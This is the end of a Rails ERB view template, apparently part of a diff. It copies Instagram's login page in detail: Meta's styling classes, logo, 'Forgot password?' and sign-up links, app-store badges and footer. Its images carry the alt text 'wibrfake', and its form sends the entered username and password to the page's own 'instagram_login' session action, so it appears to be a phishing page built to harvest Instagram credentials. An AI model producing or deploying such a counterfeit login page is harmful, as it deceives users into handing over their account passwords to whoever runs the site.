x13vifvy x11njtxf xqyf9gi xg01cxk x1rkc77x x19991ni x9lcvmn xnpuxes", alt: 'wibrfake'%><%= image_tag 'instagram/screenshot3.png', class: "x972fbf xcfux6l x1qhh985 xm0m39n xk390pu xns55qn xu96u03 xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x10l6tqk x13vifvy x11njtxf xqyf9gi x1hc1fzr x1rkc77x x19991ni x1lizcpb xnpuxes xhtitgo", alt: 'wibrfake'%><%= image_tag 'instagram/screenshot4.png', class: 'x972fbf xcfux6l x1qhh985 xm0m39n xk390pu xns55qn xu96u03 xdj266r x11i5rnm xat24cr x1mh8g0r xg01cxk xexx8yu x4uap5 x18d9i69 xkhd6sd x10l6tqk x13vifvy x11njtxf xlshs6z xqyf9gi', alt: 'wibrfake'%></div></div><div class="x5n08af x78zum5 xdt5ytf x1iyjqo2 xl56j7k x7qam4e x14vqqas x15lw1kp x1dc814f x1owpceq xh8yej3"><div class="x6s0dn4 xvbhtw8 x1pmru9 x1yvgwvq x1dqoszc x1ixjvfu xhk4uv x146dn1l x11t77rh x1thhq0t xf6uls8 x13fuv20 x1qgpocp xu3j5b3 xne9koi x1q0q8m5 xxrrrr8 x26u7qi xyyqvqm x178xt8z xm81vs4 xso031l xy80clv x9f619 x78zum5 xjl7jj xdt5ytf x2lah0s xln7xf2 xk390pu xdj266r x11i5rnm x1mh8g0r xyorhqc xzboxd6 x889kno x4uap5 x1a8lsjc xkhd6sd x1n2onr6 x11njtxf"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xseo6mj xod5an3 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><i data-visualcompletion="css-img" aria-label="Instagram" class="" role="img" style="background-image: url("https://static.cdninstagram.com/rsrc.php/v4/yB/r/E7m8ZCMOFDS.png"); background-position: 0px 0px; background-size: auto; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"><%= image_tag 'instagram/instagram-logo.png', class: 'wibrfake-img', alt: 'wibrfake'%></i></div><div class="xod5an3 x1dc814f xh8yej3"><div><form class=" form x972fbf xcfux6l x1qhh985 xm0m39n x78zum5 xdt5ytf xln7xf2 xk390pu xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x11njtxf" id="loginForm formulario" method="post" action="<%= url_for(controller: 'sessions', action: 'instagram_login') %>"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xqui205 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><div class="xdj266r x1m39q7l xzueoph x540dpk"><div class="x6s0dn4 xnz67gz x19gtwsn x1nk0tez x1xp9za0 x1hm1hlx x1npaq5j x1c83p5e x1enjb0b x199158v x13fuv20 xu3j5b3 x1q0q8m5 x26u7qi x178xt8z xm81vs4 xso031l xy80clv x9f619 x5n08af x78zum5 x1q0g3np xvs91rp x1n2onr6 xh8yej3"><label class="_aa48"><span class="_aa4a"></span><input placeholder="Username or email" onfocus="this.placeholder = ''" onblur="this.placeholder = 'Username or email'" aria-label="Phone number, username, or email" aria-required="true" autocapitalize="none" autocorrect="off" maxlength="75" class="_aa4b _add6 _ac4d _ap35" dir="" type="text" name="username"></label><div class="x6s0dn4 x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 xdl72j9 x1q0g3np x1c4vz4f x2lah0s xk390pu x5yr21d xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x18d9i69 xkhd6sd x1sxyh0 x1n2onr6 xxymvpz"></div></div></div><div class="xdj266r x1m39q7l xzueoph x540dpk"><div class="x6s0dn4 xnz67gz x19gtwsn x1nk0tez x1xp9za0 x1hm1hlx x1npaq5j x1c83p5e x1enjb0b x199158v x13fuv20 xu3j5b3 x1q0q8m5 x26u7qi x178xt8z xm81vs4 xso031l xy80clv x9f619 x5n08af x78zum5 x1q0g3np xvs91rp x1n2onr6 xh8yej3"><label class="_aa48"><span class="_aa4a"></span><input placeholder="Password" onfocus="this.placeholder = ''" onblur="this.placeholder = 'Password'" aria-label="Password" aria-required="true" autocapitalize="none" autocorrect="off" class="_aa4b _add6 _ac4d _ap35" type="password" value="" name="password" id="password"></label><div class="x6s0dn4 x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 xdl72j9 x1q0g3np x1c4vz4f x2lah0s xk390pu x5yr21d xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x18d9i69 xkhd6sd x1sxyh0 x1n2onr6 xxymvpz"></div></div></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><button class=" _acan _acap _acas _aj1- _ap30" type="submit"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">Log in</div></button></div></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x14vqqas x1uhb9sk x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xc26acl x1qjc9v5 xamitd3 x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz x7l2uk3 xxjqeqe x1yc6y37 xalplay x1fhwpqd x9hjye6 x1717ian xmrbqaa x1lr0zt7 x1b95m5r xk9bwil x1m60dep _a6hd" href="https://www.instagram.com/accounts/password/reset/" role="link" tabindex="0"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye xvs91rp xo1l8bm x7l2uk3 x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 18px; --lineHeight: 18px;" dir="auto">Forgot password?</span></a></div></form></div></div></div><div class="x6s0dn4 xvbhtw8 x1pmru9 x1yvgwvq x1dqoszc x1ixjvfu xhk4uv x146dn1l x11t77rh x1thhq0t xf6uls8 x13fuv20 x1qgpocp xu3j5b3 xne9koi x1q0q8m5 xxrrrr8 x26u7qi xyyqvqm x178xt8z xm81vs4 xso031l xy80clv x9f619 x78zum5 xjl7jj xdt5ytf x2lah0s xln7xf2 xk390pu xdj266r x11i5rnm x1mh8g0r xyorhqc xzboxd6 x889kno x4uap5 x1a8lsjc xkhd6sd x1n2onr6 x11njtxf"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye xvs91rp xo1l8bm x1roi4f4 x1tu3fi x3x7a5m x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 18px; --lineHeight: 18px;" dir="auto"><p class="x5n08af x1f6kntn xcxhlts x1jqylkn x1fqp7bg x13ibhcj x2b8uid">Don't have an account? <a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz _a6hd" href="https://www.instagram.com/accounts/emailsignup/" role="link" tabindex="0"><span class="x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs xt0psk2 x1i0vuye xvs91rp x1s688f x173jzuc x10wh9bi x1wdrske x8viiok x18hxmgj" style="line-height: 18px;">Sign up</span></a></p></span></div><div class="x78zum5 xdt5ytf"><div class="x1anpbxc x1h5jrl4 xyorhqc xmn8rco"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye xvs91rp xo1l8bm x5n08af x2b8uid x1tu3fi x3x7a5m x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 18px; --lineHeight: 18px;" dir="auto">Get the app.</span></div><div class="x78zum5 x1b7blni xl56j7k x1anpbxc x11i5rnm xyorhqc x1mh8g0r"><a aria-label="Download on the App Store" class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz x1emribx x2pgyrj _a6hd" href="https://apps.apple.com/app/instagram/id389801252?ct=igweb.unifiedHome.badge&mt=8&pt=428156&vt=lo" rel="nofollow noreferrer" role="link" tabindex="0" target="_blank"><%= image_tag 'instagram/app-store.png', class: 'x1vqgdyp', alt: 'Download on the App Store'%></a><a aria-label="Get it on Google Play" class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz x1emribx x2pgyrj _a6hd" href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3D208012EF-5BA7-411B-AAFF-95F0AA807F5C%26utm_campaign%3DunifiedHome%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge" rel="nofollow noreferrer" role="link" tabindex="0" target="_blank"><%= image_tag 'instagram/google-play.png', class: 'x1vqgdyp', alt: 'Get it on Google Play'%></a></div></div></div></article></main><footer class="x1qjc9v5 x9f619 x78zum5 xdt5ytf x2lah0s xk390pu xdj266r x11i5rnm xat24cr x1mh8g0r x1h3rv7z xexx8yu x18d9i69 x1n2onr6 x11njtxf x1pi30zi x1swvt13 xvbhtw8" role="contentinfo"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x5u0ere x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xqui205 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s x1q0g3np x1a02dak xqjyukv x1qjc9v5 x1oa3qoh xl56j7k"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://about.meta.com/" rel="nofollow noopener noreferrer" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Meta</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://about.instagram.com/" rel="nofollow noopener noreferrer" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">About</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://about.instagram.com/blog/" rel="nofollow noopener noreferrer" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Blog</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://about.instagram.com/about-us/careers" rel="nofollow noopener noreferrer" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Jobs</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://help.instagram.com/" rel="nofollow noopener noreferrer" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Help</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://developers.facebook.com/docs/instagram" rel="nofollow noopener noreferrer" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">API</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 xggy1nq x1a2a7pz x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4 _a6hd" href="https://www.instagram.com/legal/privacy/" role="link" tabindex="0"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Privacy</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 xggy1nq x1a2a7pz x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4 _a6hd" href="https://www.instagram.com/legal/terms/" role="link" tabindex="0"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Terms</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 xggy1nq x1a2a7pz x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4 _a6hd" href="https://www.instagram.com/explore/locations/" role="link" tabindex="0"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Locations</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 xggy1nq x1a2a7pz x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4 _a6hd" href="https://www.instagram.com/web/lite/" role="link" tabindex="0"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Instagram Lite</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4" href="https://www.threads.net/" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Threads</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 xggy1nq x1a2a7pz x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4 _a6hd" href="https://www.facebook.com/help/instagram/261704639352628" rel="nofollow noreferrer" role="link" tabindex="0" target="_blank"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Contact Uploading & Non-Users</span></a></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xod5an3 x1i64zmx x1emribx x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><a class="x1i10hfl xjbqb8w x1ejq31n xd10rxx x1sy0etr x17r0tee x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 xggy1nq x1a2a7pz x1fhwpqd xz5fbns x1hl2dhg xb5lr1p x6mezaz x1roi4f4 _a6hd" href="https://www.instagram.com/accounts/meta_verified/?entrypoint=web_footer" role="link" tabindex="0"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">Meta Verified</span></a></div></div></div><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x14vqqas xod5an3 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s x1q0g3np xqjyukv x1qjc9v5 x1oa3qoh xl56j7k"><span class="x1ypdohk x1rg5ohu x1n2onr6 x16dsc37"><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1uhb9sk x1plvlek xryxfnj x1c4vz4f x2lah0s x1q0g3np xqjyukv x6s0dn4 x1oa3qoh xl56j7k"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">English</span><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xsgj6o6 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x6s0dn4 x1oa3qoh xl56j7k"><span style="display: inline-block; transform: rotate(180deg);"><svg aria-label="Down chevron icon" class="x1lliihq x1n2onr6 x1roi4f4" fill="currentColor" height="12" role="img" viewBox="0 0 24 24" width="12"><title>Down chevron icon</title><path d="M21 17.502a.997.997 0 0 1-.707-.293L12 8.913l-8.293 8.296a1 1 0 1 1-1.414-1.414l9-9.004a1.03 1.03 0 0 1 1.414 0l9 9.004A1 1 0 0 1 21 17.502Z"></path></svg></span></div></div><select aria-label="Switch Display Language" class="x1ypdohk x5yr21d x17qophe xg01cxk x10l6tqk x13vifvy xh8yej3"><option value="af">Afrikaans</option><option value="ar">العربية</option><option value="cs">Čeština</option><option value="da">Dansk</option><option value="de">Deutsch</option><option value="el">Ελληνικά</option><option value="en" selected="selected">English</option><option value="en-gb">English (UK)</option><option value="es">Español (España)</option><option value="es-la">Español</option><option value="fa">فارسی</option><option value="fi">Suomi</option><option value="fr">Français</option><option value="he">עברית</option><option value="id">Bahasa Indonesia</option><option value="it">Italiano</option><option value="ja">日本語</option><option value="ko">한국어</option><option value="ms">Bahasa Melayu</option><option value="nb">Norsk</option><option value="nl">Nederlands</option><option value="pl">Polski</option><option value="pt-br">Português (Brasil)</option><option value="pt">Português (Portugal)</option><option value="ru">Русский</option><option value="sv">Svenska</option><option value="th">ภาษาไทย</option><option value="tl">Filipino</option><option value="tr">Türkçe</option><option value="zh-cn">中文(简体)</option><option value="zh-tw">中文(台灣)</option><option value="bn">বাংলা</option><option value="gu">ગુજરાતી</option><option value="hi">हिन्दी</option><option value="hr">Hrvatski</option><option value="hu">Magyar</option><option value="kn">ಕನ್ನಡ</option><option value="ml">മലയാളം</option><option value="mr">मराठी</option><option value="ne">नेपाली</option><option value="pa">ਪੰਜਾਬੀ</option><option value="si">සිංහල</option><option value="sk">Slovenčina</option><option value="ta">தமிழ்</option><option value="te">తెలుగు</option><option value="ur">اردو</option><option value="vi">Tiếng Việt</option><option value="zh-hk">中文(香港)</option><option value="bg">Български</option><option value="fr-ca">Français (Canada)</option><option value="ro">Română</option><option value="sr">Српски</option><option value="uk">Українська</option></select></span><div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1d52u69 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x1ji0vk5 x18bv5gf x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye x1fhwpqd xo1l8bm x1roi4f4 x1s3etm8 x676frb x10wh9bi x1wdrske x8viiok x18hxmgj" style="----base-line-clamp-line-height: 16px; --lineHeight: 16px;" dir="auto">© 2025 Instagram from Meta</span></div></div></div></footer></section></div></div><div><div></div></div></div><div><div></div></div></div></div></div></div></div></div>
|
23
|
+
<% content_for :stylesheet do %>
|
24
|
+
<%= stylesheet_link_tag 'instagram/page_instagram' %>
|
25
|
+
<% end %>
|
26
|
+
<script type="application/json" data-content-len="53" data-sjs="">{"require":[["maybeDisableAnimations",null,null,[]]]}</script>
|
27
|
+
